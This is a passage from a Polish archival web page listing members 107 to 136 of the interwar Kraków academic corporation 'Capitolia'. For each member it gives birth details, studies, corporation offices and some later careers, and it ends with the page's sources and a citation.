 107. Eugeniusz Rajmund Stojęba-Stantejski, (19 sierpnia 1907 w Gregradzie k. Zagrzebia - ) absolwent Gimnazjum w Bielsku 1927, student prawa UJ 1927-29, a następnie filologii Wydział Filozoficzny UJ 1930-, c. ok. 1928 Lauda, wystąpił, c. 1931 Capitolia, akt. 1931-32, sekretarz sem. let. 1930/31, sekretarz wewn. sem. zim. 1931/32
 108. Zenon Jan Stankiewicz, (10 czerwca 1907 w Krakowie - 17 sierpnia 1944 w Swaryszowie k. Sędziszowa) s. Franciszka, absolwent VIII Gimnazjum Matematyczno-Przyrodniczego w Krakowie 1927, student i absolwent Wydziału Górniczego AG 1927-35, c. 1928, akt. 1928-31, dwukrotnie sekretarz, w tym po raz drugi sem. zim. 1929/30, dwukrotnie wiceprezes, w tym sem. zim. 1930/31, prezes sem. zim. 1930/31, olderman sem. let. 1930/31 (jeden miesiąc), pracownik Parowozowni w Tarnowskich Górach 1935-39, technik budowlany w firmie budowlanej w Sędziszowie k. Kielc 1943/44, ppor. AK ps. “Wysoki”, rozstrzelany przez Niemców
 109. Jan Stapf, brat Stanisława (Capitolia) i Mieczysława (Demetria), student prawa i absolwent prawa UJ, c. 1927, akt. 1927

  Stanisław Stapf, 1932 r.

 110. Stanisław Stapf, brat Jana (Capitolia) i Mieczysława (Demetria), student filozofii UJ, a następnie student i absolwent (mgr filozofii) UP, dyrektor teatru lalek

 111. Edmund (Stefan ?) Stefanowicz, student WSH, c. 1929, akt. 1929-31
 112. Alfred Stelmach, mgr praw, akt. 1931, w 1938 w Warszawie
 113. Edward J. Stoch (?), student med. (?) UJ, c. 1928, akt. 1928
 114. Marian Szayer, akt. 1938-39, skarbnik sem. let. 1938/39
 115. Kazimierz Jerzy Szłapka, (23 lutego 1911 w Kolejach w pow. śremskim - ) absolwent Gimnazjum im. Józefa Wybickiego w Śremie, student polonistyki Wydział Filozoficzny UJ 1929-31, c. 1930, akt. 1930-31, sekretarz 1931, wystąpił 1931
 116. Julian Szynalik, (26 kwietnia 1912 w Mszanie Dolnej - ) absolwent Gimnazjum w Wadowicach, student prawa UJ, c. 1931, akt. 1931
 117. Kazimierz Śliwa, c. 1938, akt. 1938-39
 118. Alfred Stanisław Tichuachy (?), c. 1927, akt. 1927
 119. Stanisław Tota, (28 kwietnia 1911 w Skawinie - ) absolwent Gimnazjum w Krakowie, student WSH, c. 1929, akt. 1929
 120. Zbigniew Trojanowski, (12 luty 1912 w Tuchinie (?) w woj. krakowskim - ) absolwent Gimnazjum w Krakowie 1932, student prawa UJ 1934- , c. 1935, akt. 1935
 121. Tadeusz Wajeryk (?), (20 sierpnia 1911 w Pohrebyszczach w Rosji - ) absolwent Gimnazjum w Krakowie, student prawa UJ, c. 1934, akt. 1934
 122. Juliusz Warski, (23 luty 1917 w Sanoku - ) absolwent Gimnazjum im. Henryka Sienkiewicza w Krakowie 1934, student polonistyki UJ, c. 1934, akt. 1934
 123. Antoni Warywoda, (?), (23 lipca 1908 w Mikulczynie pow. Nadworna - ) absolwent Gimnazjum we Lwowie 1928, student architektury ASP w Warszawie 1928-30, student ASP w Krakowie 1930-31, c. 1931, akt. 1931 (?)
 124. Tadeusz Tomasz Wawszczyk, (13 listopada 1904 w Przemyślu - ) absolwent Gimnazjum Matematyczno-Przyrodniczego w Jarosławiu 1926, student fil. UJ, c. 1928, akt. 1928
 125. Ludwik Wentzel (?), (18 czerwca 1910 w Bielsku - ) absolwent Gimnazjum w Cieszynie 1930, student prawa UJ 1932-34, c. 1934, akt. 1934
 126. Andrzej Wierzbicki, student filozofii UJ, c. 1926/27, akt. 1926/27
 127. Tadeusz Winiński (Wimiński ?), (10 października 1908 w Stanisławowie - ) absolwent Gimnazjum w Toruniu 1927, student med. UJ., c. 1928, akt. 1928-29, skreślony ok. 1929
 128. Witold Witalioński (Witaliński), student prawa UJ, c. 1927, akt. 1927-1929, wiceprezes 1927, olderman sem. let. 1927/28, wiceprezes sem. zim. 1928/29
 129. Janusz Własnowolski, (20 czerwca 1913 - ) absolwent Gimnazjum w Żywcu 1931, student prawa UJ, c. 1931, akt. 1931, w 1938 w Krakowie
 130. Andrzej Wołoszyński, c. 1926, akt. 1926
 131. Wiesław Wróblewski, (30 sierpnia 1911 w Sosnowcu - po 1953) s. Antoniego, absolwent Gimnazjum im. S. Wyspiańskiego w Sosnowcu 1930, student i absolwent Wydziału Hutniczego AG 1930-39, c. 1931Capitolia, akt. 1931, akt. 1939 Gnomia, po studiach pracownik m.in. Huty “Częstochowa” w Częstochowie, kopalni “Niwka” w Niwce, kierownik walcowni bruzdowej, młotowni, prasowni i ciągarni w Hucie “Batory” w Chorzowie 1945-50, główny technolog Huty im. Świerczewskiego w Zawadzkim 1951, główny branżowiec kuźnictwa w Ministerstwie Hutnictwa 1952, od 1953 starszy technolog walcowni i wydziału kształtowników ciągłych w Hucie im. Lenina
 132. Roman Zając, c. 1938, akt. 1938-39, sekretarz sem. let. 1938/39
 133. Edward Ządecki, c. 1938, akt. 1938-39
 134. Jan Żydłowicz, (1912 w Krakowie - ) absolwent Gimnazjum 1931, student prawa UJ 1933- , c. 1933, akt. 1933
 135. Władysław Żydłowicz, (ok. 1911 - ok. 1986) syn Władysława (Capitolia), student i absolwent rolnictwa UJ, założyciel Capitolii, c. 1926, akt. 1926-28, wiceprezes sem. zim. 1926/27, sekretarz sem. let. 1927/28, w 1938 w Krakowie
 136. Adam Żyłowski, (8 września 1914 w Tarnopolu - ) absolwent klasycznego Gimnazjum w Królewskiej Hucie, student prawa UJ, c. 1933, akt. 1933

Listę członków opracowano na podstawie:

Pieczęć Capitolii, 1931 r.

1) “Capitolia” Korporacja Akademicka w Krakowie, (w:) Biuletyn Krakowskiego Koła Międzykorporacyjnego. Za semestr letni roku akademickiego 1930-1931, Kraków 1931, 34 i n.,
2) Capitolia Korporacja Akademicka w Krakowie, (w:) Biuletyn Krakowskiego Koła Międzykorporacyjnego. Za semestr letni roku akademickiego 1938-1939, Kraków 1938, s. 29 i n.,
3) materiałów archiwalnych z Archiwum Korporacyjnego,
4) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Capitolia.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 16 VIII 2010 r.
Ostatnia zmiana: 26 VII 2014 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Korporacja Akademicka “Capitolia” (Kraków), (na:) www.archiwumkorporacyjne.pl, stan 26 VII 2014 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }